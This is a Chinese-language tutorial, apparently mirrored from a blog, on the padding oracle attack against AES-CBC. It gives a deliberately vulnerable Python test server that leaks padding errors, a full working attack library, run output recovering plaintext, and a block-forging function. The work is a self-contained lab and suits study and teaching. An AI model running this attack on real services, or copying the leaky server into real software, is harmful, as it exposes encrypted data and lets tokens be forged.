AES CBC模式下的Padding Oracle解密

AES CBC模式下的Padding Oracle解密

1 簡介

Padding Oracle攻擊方法出現的也比較早了,參考padding oracle attack,這篇文章寫的比較好。 也能夠參考ctf-wiki。 Padding Oracle Attack主要是針對CBC分組加密的狀況,經過padding來測試每一個分組的每一個字節是否正確來獲取分組的中間狀態值,上一個分組XOR中間狀態值就是明文。第一個分組使用初始IV來XOR得到明文。 css

https://img2018.cnblogs.com/blog/1545892/201906/1545892-20190621172625457-1317081856.jpg

圖1  CBC模式一個分組的解密過程html

2 aes cbc加解密測試程序

用FLASK實現一個aes cbc加解密的測試程序,代碼以下,保存爲aes_server.py: java

#!/usr/bin/python
# coding=utf-8
# python 3
# 安裝依賴 pip3 install PyCrypto flask
# 運行 FLASK_APP=aes_server.py  flask run

from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlparse, parse_qs, unquote
import traceback

import base64
import hashlib
from Crypto import Random
from Crypto.Cipher import AES

# padding 對齊的字節數
BS = 16


def pad(s):
    return s + (BS - len(s) % BS) * chr(BS - len(s) % BS)


def unpad(s):
    '''檢查解密串的padding是否正確,並去掉Padding'''
    pad = s[-1]
    # padding值不對就拋出異常,網上的python實現基本都忽略了padding值檢查
    if pad > BS or pad < 1:
        # padding值大於0小於等於最大分組字節數
        raise Exception("padding error.")
    slen = len(s)
    for p in s[slen-pad:slen]:
        # 全部padding值相等
        if p != pad:
            raise Exception("padding value error.")
    print("unpad:", pad)
    return s[0:-pad]


class AESCipher:
    """ AES cbc 加解密
    """

    def __init__(self, key):
        self.key = key.encode('utf-8')

    def encrypt(self, raw):
        raw = pad(raw).encode('utf-8')
        iv = Random.new().read(AES.block_size)
        c = AES.new(self.key, AES.MODE_CBC, iv)
        return str(base64.b64encode(iv + c.encrypt(raw)), 'utf-8')

    def decrypt(self, enc):
        enc = base64.b64decode(enc)
        iv = enc[:16]
        c = AES.new(self.key, AES.MODE_CBC, iv)
        deced = unpad(c.decrypt(enc[16:]))
        return deced


cipher = AESCipher('1234567890123456')
# cipher.encrypt('testaa')

form = '''<!DOCTYPE html>
<title>aes encoder/decoder</title>
<form method="POST" action="/encode">
<textarea name="body"></textarea>
<br>
<button type="submit">加密</button>
</form>'''

PORT_NUMBER = 8081


def b64_url_dec(s):
    return s.replace('~', '=').replace('!', '/').replace('-', '+')


def b64_url_enc(s):
    return s.replace('+', '-').replace('/', '!').replace('=', '~')


class myHandler(BaseHTTPRequestHandler):
    # Handler for the GET requests
    def write_out(self, data):
        self.send_response(200)
        self.send_header('Content-type', 'text/html; charset=utf-8')
        self.end_headers()
        self.wfile.write(data)

    def do_GET(self):
        if "/decode" in self.path:
            try:
                # 解密操做
                query = urlparse(self.path).query
                print('decode query:', query)
                query_components = dict(qc.split("=")
                                        for qc in query.split("&"))
                data = b64_url_dec(unquote(query_components["data"]))
                deced = cipher.decrypt(data)
                self.write_out(deced)
            except:
                self.write_out(traceback.format_exc().encode())
        elif "/check" in self.path:
            try:
                # 檢查是否能正確解密
                query = urlparse(self.path).query
                print('check query:', query)
                query_components = dict(qc.split("=")
                                        for qc in query.split("&"))
                data = b64_url_dec(unquote(query_components["data"]))
                deced = cipher.decrypt(data)
                self.write_out(u'成功經過!'.encode('utf-8'))
            except:
                self.write_out(traceback.format_exc().encode())
        else:
            self.write_out(form.encode())

    def do_POST(self):
        print("post:", self.path)
        if self.path == "/encode":
            # 加密操做
            try:
                content_len = int(self.headers.get('Content-Length'))
                post_body = self.rfile.read(content_len)
                postvars = parse_qs(post_body, keep_blank_values=1)
                print('post encode vars:', postvars)
                body = str(postvars[b'body'][0], 'utf-8')
                enced = cipher.encrypt(body)
                out = b64_url_enc(enced)
                self.write_out(out.encode())
            except:
                self.write_out(traceback.format_exc().encode())


try:
    # Create a web server and define the handler to manage the
    # incoming request
    server = HTTPServer(('', PORT_NUMBER), myHandler)
    print('Started httpserver on port ', PORT_NUMBER)
    # Wait forever for incoming htto requests
    server.serve_forever()

except KeyboardInterrupt:
    print('^C received, shutting down the web server')
    server.socket.close()

encode用於加密一個字符串,decode解密加密後的字符串,check用於測試加密串是否正確,這裏使用check進行Padding Oracle Attack測試,比較接近真實狀況。 python

啓動flask server,經過8081端口訪問: git

FLASK_APP=aes_server.py  flask run

使用python測試請求,代碼以下: github

# coding=utf-8
# python 3
# 安裝依賴 pip3 install requests

import requests as req

proxy = 'http://127.0.0.1:8080'
MY_PROXY = {
    # 本地代理,用於測試,若是不須要代理能夠註釋掉
    #'http': proxy,
    #'https': proxy,
}

# server端地址,測試的時候使用windows本機啓動FLASK,python代碼訪問會卡住。
host = 'http://192.168.47.129:8081'


def test_enc(txt):
    '''測試加密'''
    resp = req.post(host + '/encode', data={'body': txt}, proxies=MY_PROXY)
    return resp.text


def test_dec(txt):
    '''測試解密'''
    resp = req.get(host + '/decode', params={'data': txt}, proxies=MY_PROXY)
    return resp.text


def test_check(txt):
    '''測試檢查'''
    resp = req.get(host + '/check', params={'data': txt}, proxies=MY_PROXY)
    return resp.text

測試加密功能: web

print(test_enc('this is a test'))

加密結果以下: sql

DAEeUIUbJiXSuxmR8PDlIlOSj5EUKxgueLKy!Wiysd0~

測試解密功能: shell

print(test_dec('CLBtfIAQc4PLeB9-6m9XGmtBH34O98vrcw54KPTtx3M~'))
this is a test

解密後的明文padding錯誤的狀況: flask

print(test_check('CLBtfIAQc4PAeBA-6m9XGmtAH34O98vrcw54KPTtx3M~'))
Traceback (most recent call last):
  File "/mnt/hgfs/mhome/docs/ctf/helper/aes_server.py", line 112, in do_GET
    deced = cipher.decrypt(data)
  File "/mnt/hgfs/mhome/docs/ctf/helper/aes_server.py", line 57, in decrypt
    deced = unpad(c.decrypt(enc[16:]))
  File "/mnt/hgfs/mhome/docs/ctf/helper/aes_server.py", line 30, in unpad
    raise Exception("padding error.")
Exception: padding error.

當發送的密文不能解密的時候,會返回padding錯誤的異常(不必定爲異常,只要跟解密成功的結果不一樣就能夠),這樣就會形成Padding Oracle攻擊。

3 Padding Oracle Attack過程

當服務器處理CBC解密時,對於失敗和成功返回不一樣的結果,就能進行Padding Oracle Attack。相似於布爾型SQL注入,針對每一個分組的每一個字節,輸入正確的padding值(至關於明文),修改這個分組的iv,測試並找到返回成功的結果,與padding值XOR就能得到中間狀態值(即圖中的I2)。

padding oracle實現代碼:

# coding=utf-8
# python 3
# padding oracle 實現代碼

from Crypto import Random


# 分組最大字節數
BS = 16


def pad(s):
    return s + (BS - len(s) % BS) * chr(BS - len(s) % BS)


def unpad(s):
    return s[0:-s[-1]]


def find_valid_byte(req_fn, find_valid_fn, data, pos, min_req):
    '''找到解密數據指定位置的正確IV字節值
    req_fn 請求解密的函數
    find_valid_fn 找到正確值的函數,參數爲測試值和req_fn返回結果組成的map,如{1 : 'resp data'},
                    返回結果爲正確的值,沒有則須要返回None
    data 要解密的數據
    pos 要查找正確值的位置
    min_req 最小測試次數,請求達到min_req次,就會比較是否找到正確的padding值'''
    data = bytearray(data)
    results = {}
    for i in range(0x100):
        # 檢測從0到255的值是否符合padding要求
        data[pos] = i
        results[i] = req_fn(bytes(data))
        if i >= min_req:
            r_data = find_valid_fn(results)
            if r_data:
                return r_data
    return find_valid_fn(results)


def format_padding_iv(iv, pos, value):
    '''格式化padding對應的iv
    pos 指定開始位置
    value 要測試的padding值
    '''
    r = bytearray(iv)
    for idx, val in enumerate(r):
        if idx > pos:
            r[idx] = val ^ value
        else:
            r[idx] = val
    return bytes(r)


def padding_oracle_group(req_fn, find_valid_fn, data, orig_iv, i_state=b'', min_req=256):
    ''' 獲取一組數據的解密結果和intermiedate state
    req_fn 請求解密的函數
    find_valid_fn 找到正確值的函數,參數爲測試值和req_fn返回結果組成的map,如{1 : 'resp data'},
                    返回結果爲正確的值,沒有則須要返回None
    data 要解密的數據, bytes
    orig_iv 要解密數據的iv, bytes
    i_state 若是指定i_state,則會從沒找到的位置繼續
    '''
    count = BS - len(i_state)
    iv = bytearray(Random.new().read(count) + i_state)
    r_istate = bytearray(i_state)
    for pos in reversed(range(count)):
        print("pos:%d iv:%s istate:%s" % (pos, iv, r_istate))
        pad_v = BS - pos
        curr_data = format_padding_iv(iv, pos, pad_v) + data
        print('pad_v:', pad_v, ' test data:', curr_data)
        val = find_valid_byte(req_fn, find_valid_fn, curr_data, pos, min_req)
        if val:
            r = val ^ pad_v
            print("find istate %02x at pos:%d" % (r, pos))
            iv[pos] = r
            r_istate.insert(0, r)
        else:
            print("can't find istate at pos:", pos)
            return None, r_istate
    deced_res = bytes(a ^ b for (a, b) in zip(orig_iv, r_istate))
    return deced_res, r_istate


def partition_group(data):
    '''data按分組長度進行分組'''
    return [data[i:i+BS] for i in range(0, len(data), BS)]


def padding_oracle(req_fn, find_valid_fn, data, min_req=256):
    '''獲取一組數據的解密結果和intermiedate state
    req_fn 請求解密的函數
    find_valid_fn 找到正確值的函數,參數爲測試值和req_fn返回結果組成的map,如{1 : 'resp data'},
                    返回結果爲正確的值,沒有則須要返回None
    data 加密數據,注意前面要帶上iv
    min_req 最小測試次數,請求達到min_req次,就會測試是否包含有效的padding, 
               用於加速,若是找到有效padding值,後面就再也不調用req_fn了。
               默認所有請求結束再查找正確的padding值。
    '''
    parts = partition_group(data)
    ivs = parts[:-1]
    datas = parts[1:]
    result = b''
    istates = []
    for group_iv, group_data in zip(ivs, datas):
        group_result, group_istate = padding_oracle_group(
            req_fn, find_valid_fn, group_data, group_iv, min_req=min_req)
        result += group_result
        istates.append(group_istate)
    return result, istates

測試代碼:

import re
import base64

############### 編碼輔助函數
def b64_url_dec(s):
    return s.replace('~', '=').replace('!', '/').replace('-', '+')


def b64_url_enc(s):
    return s.replace('+', '-').replace('/', '!').replace('=', '~')


def bytes_to_str(data):
    return "".join(chr(x) for x in bytearray(data))


############## 解密輔助函數
def my_dec_req(data):
    '''測試解密,注意這裏的data是原始字節'''
    txt = b64_url_enc(bytes_to_str(base64.b64encode(data)))
    return test_check(txt)


def my_check_ok(resps):
    '''檢測並返回解密成功的值'''
    for value, resp in resps.items():
        if re.match(r'成功', resp):
            return value
    return None

解密測試:

# 獲取一個加密數據
test1 = test_enc('go gogogogo')
test_data = base64.b64decode(b64_url_dec(test1))

# 這裏使用min_req選項,能顯著加快運行速度
results = padding_oracle(my_dec_req, my_check_ok, test_data, min_req=10)
print(results)

程序運行結果:

pos:15 iv:bytearray(b'\xd5\xd1\xfc\xc0=W\xdf\xa1W\x15\xc5?\xc3T\x88\xc5') istate:bytearray(b'')
pad_v: 1  test data: b'\xd5\xd1\xfc\xc0=W\xdf\xa1W\x15\xc5?\xc3T\x88\xc58\xdcM\x98S\xe6D\xfe[|\x93\x14$\x96\x1f\xcb'
find istate 2b at pos:15
pos:14 iv:bytearray(b'\xd5\xd1\xfc\xc0=W\xdf\xa1W\x15\xc5?\xc3T\x88+') istate:bytearray(b'+')
pad_v: 2  test data: b'\xd5\xd1\xfc\xc0=W\xdf\xa1W\x15\xc5?\xc3T\x88)8\xdcM\x98S\xe6D\xfe[|\x93\x14$\x96\x1f\xcb'
find istate cd at pos:14
pos:13 iv:bytearray(b'\xd5\xd1\xfc\xc0=W\xdf\xa1W\x15\xc5?\xc3T\xcd+') istate:bytearray(b'\xcd+')
pad_v: 3  test data: b'\xd5\xd1\xfc\xc0=W\xdf\xa1W\x15\xc5?\xc3T\xce(8\xdcM\x98S\xe6D\xfe[|\x93\x14$\x96\x1f\xcb'
find istate 99 at pos:13
pos:12 iv:bytearray(b'\xd5\xd1\xfc\xc0=W\xdf\xa1W\x15\xc5?\xc3\x99\xcd+') istate:bytearray(b'\x99\xcd+')
pad_v: 4  test data: b'\xd5\xd1\xfc\xc0=W\xdf\xa1W\x15\xc5?\xc3\x9d\xc9/8\xdcM\x98S\xe6D\xfe[|\x93\x14$\x96\x1f\xcb'
find istate 42 at pos:12
pos:11 iv:bytearray(b'\xd5\xd1\xfc\xc0=W\xdf\xa1W\x15\xc5?B\x99\xcd+') istate:bytearray(b'B\x99\xcd+')
pad_v: 5  test data: b'\xd5\xd1\xfc\xc0=W\xdf\xa1W\x15\xc5?G\x9c\xc8.8\xdcM\x98S\xe6D\xfe[|\x93\x14$\x96\x1f\xcb'
find istate f3 at pos:11
pos:10 iv:bytearray(b'\xd5\xd1\xfc\xc0=W\xdf\xa1W\x15\xc5\xf3B\x99\xcd+') istate:bytearray(b'\xf3B\x99\xcd+')
pad_v: 6  test data: b'\xd5\xd1\xfc\xc0=W\xdf\xa1W\x15\xc5\xf5D\x9f\xcb-8\xdcM\x98S\xe6D\xfe[|\x93\x14$\x96\x1f\xcb'
find istate 6e at pos:10
pos:9 iv:bytearray(b'\xd5\xd1\xfc\xc0=W\xdf\xa1W\x15n\xf3B\x99\xcd+') istate:bytearray(b'n\xf3B\x99\xcd+')
pad_v: 7  test data: b'\xd5\xd1\xfc\xc0=W\xdf\xa1W\x15i\xf4E\x9e\xca,8\xdcM\x98S\xe6D\xfe[|\x93\x14$\x96\x1f\xcb'
find istate e5 at pos:9
pos:8 iv:bytearray(b'\xd5\xd1\xfc\xc0=W\xdf\xa1W\xe5n\xf3B\x99\xcd+') istate:bytearray(b'\xe5n\xf3B\x99\xcd+')
pad_v: 8  test data: b'\xd5\xd1\xfc\xc0=W\xdf\xa1W\xedf\xfbJ\x91\xc5#8\xdcM\x98S\xe6D\xfe[|\x93\x14$\x96\x1f\xcb'
find istate 7d at pos:8
pos:7 iv:bytearray(b'\xd5\xd1\xfc\xc0=W\xdf\xa1}\xe5n\xf3B\x99\xcd+') istate:bytearray(b'}\xe5n\xf3B\x99\xcd+')
pad_v: 9  test data: b'\xd5\xd1\xfc\xc0=W\xdf\xa1t\xecg\xfaK\x90\xc4"8\xdcM\x98S\xe6D\xfe[|\x93\x14$\x96\x1f\xcb'
find istate 6a at pos:7
pos:6 iv:bytearray(b'\xd5\xd1\xfc\xc0=W\xdfj}\xe5n\xf3B\x99\xcd+') istate:bytearray(b'j}\xe5n\xf3B\x99\xcd+')
pad_v: 10  test data: b'\xd5\xd1\xfc\xc0=W\xdf`w\xefd\xf9H\x93\xc7!8\xdcM\x98S\xe6D\xfe[|\x93\x14$\x96\x1f\xcb'
find istate 50 at pos:6
pos:5 iv:bytearray(b'\xd5\xd1\xfc\xc0=WPj}\xe5n\xf3B\x99\xcd+') istate:bytearray(b'Pj}\xe5n\xf3B\x99\xcd+')
pad_v: 11  test data: b'\xd5\xd1\xfc\xc0=W[av\xeee\xf8I\x92\xc6 8\xdcM\x98S\xe6D\xfe[|\x93\x14$\x96\x1f\xcb'
find istate 06 at pos:5
pos:4 iv:bytearray(b'\xd5\xd1\xfc\xc0=\x06Pj}\xe5n\xf3B\x99\xcd+') istate:bytearray(b'\x06Pj}\xe5n\xf3B\x99\xcd+')
pad_v: 12  test data: b"\xd5\xd1\xfc\xc0=\n\\fq\xe9b\xffN\x95\xc1'8\xdcM\x98S\xe6D\xfe[|\x93\x14$\x96\x1f\xcb"
find istate 04 at pos:4
pos:3 iv:bytearray(b'\xd5\xd1\xfc\xc0\x04\x06Pj}\xe5n\xf3B\x99\xcd+') istate:bytearray(b'\x04\x06Pj}\xe5n\xf3B\x99\xcd+')
pad_v: 13  test data: b'\xd5\xd1\xfc\xc0\t\x0b]gp\xe8c\xfeO\x94\xc0&8\xdcM\x98S\xe6D\xfe[|\x93\x14$\x96\x1f\xcb'
find istate aa at pos:3
pos:2 iv:bytearray(b'\xd5\xd1\xfc\xaa\x04\x06Pj}\xe5n\xf3B\x99\xcd+') istate:bytearray(b'\xaa\x04\x06Pj}\xe5n\xf3B\x99\xcd+')
pad_v: 14  test data: b'\xd5\xd1\xfc\xa4\n\x08^ds\xeb`\xfdL\x97\xc3%8\xdcM\x98S\xe6D\xfe[|\x93\x14$\x96\x1f\xcb'
find istate 94 at pos:2
pos:1 iv:bytearray(b'\xd5\xd1\x94\xaa\x04\x06Pj}\xe5n\xf3B\x99\xcd+') istate:bytearray(b'\x94\xaa\x04\x06Pj}\xe5n\xf3B\x99\xcd+')
pad_v: 15  test data: b'\xd5\xd1\x9b\xa5\x0b\t_er\xeaa\xfcM\x96\xc2$8\xdcM\x98S\xe6D\xfe[|\x93\x14$\x96\x1f\xcb'
find istate fc at pos:1
pos:0 iv:bytearray(b'\xd5\xfc\x94\xaa\x04\x06Pj}\xe5n\xf3B\x99\xcd+') istate:bytearray(b'\xfc\x94\xaa\x04\x06Pj}\xe5n\xf3B\x99\xcd+')
pad_v: 16  test data: b'\xd5\xec\x84\xba\x14\x16@zm\xf5~\xe3R\x89\xdd;8\xdcM\x98S\xe6D\xfe[|\x93\x14$\x96\x1f\xcb'
find istate df at pos:0
(b'go gogogogo\x05\x05\x05\x05\x05', [bytearray(b'\xdf\xfc\x94\xaa\x04\x06Pj}\xe5n\xf3B\x99\xcd+')])

能夠看到經過/check請求,成功解密出明文, 即results[0]。 results[1]是每一個數據分組的中間狀態,對應圖中的INTERMIEDATE STATE

再進一步,能夠經過修改iv實現對第一個加密的分組數據進行修改,例如:

# 能夠實現僞造第一個數據分組的內容,由於iv是能夠改變的,
# 改變原始iv,就至關於改變了第一個數據分組的解密結果。
def build_fake_first(data, fake_data, data_is):
    ''' data爲密文數據
    fake_data 僞造的第一個分組數據
    data_is 解密出的中間狀態值'''
    if len(fake_data) > BS:
        raise Exception('fake data too large!')
    new_data = bytearray(data)
    fake_group_data = pad(fake_data)
    for i in range(BS):
        new_data[i] = ord(fake_group_data[i]) ^ data_is[i]
    return new_data

my_fake = build_fake_first(test_data, 'fake data', results[1][0])
print(test_dec(b64_url_enc(bytes_to_str(base64.b64encode(my_fake)))))

由於這個加密數據只有1個分組,因此整個數據被替換掉了,結果以下:

fake data

4 總結

只要明白了分組解密的xor過程和pkcs5/pkcs7的padding填充方式,Padding Oracle利用仍是比較簡單的。

做者: ntestoc

Created: 2019-06-21 週五 17:26

相關文章
相關標籤/搜索